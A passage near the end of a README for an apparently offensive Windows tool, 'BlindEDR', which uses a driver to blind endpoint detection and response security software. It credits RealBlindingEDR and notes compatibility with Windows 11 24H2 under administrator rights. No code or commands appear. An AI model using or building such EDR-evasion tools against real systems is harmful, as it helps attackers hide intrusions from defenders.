![Snipaste_2025-01-15_14-39-41](./README.assets/Snipaste_2025-01-15_14-39-41.png) 76 | 77 | Once the blinding effect is restored, access to certain system resources is entirely disabled, reinforcing security measures. 78 | 79 | ![Snipaste_2025-01-15_14-40-43](./README.assets/Snipaste_2025-01-15_14-40-43.png) 80 | 81 | # Thanks 82 | This project was largely inspired by [RealBlindingEDR](https://github.com/myzxcg/RealBlindingEDR). Start with a simple small driver and then make driver function calls. 83 | 84 | 85 | 86 | 87 | 88 | # Update 89 | 90 | - [x] Adapt the program to the latest version of Windows 91 | 92 | > Enable the program to function properly on the latest Windows 11 24H2 version, provided that administrator privileges are required to run `BlindEDR.exe`. 93 | > If it is a different version, `BlindEDR.exe` can be run without the need for an administrator after starting the driver service. 94 | --------------------------------------------------------------------------------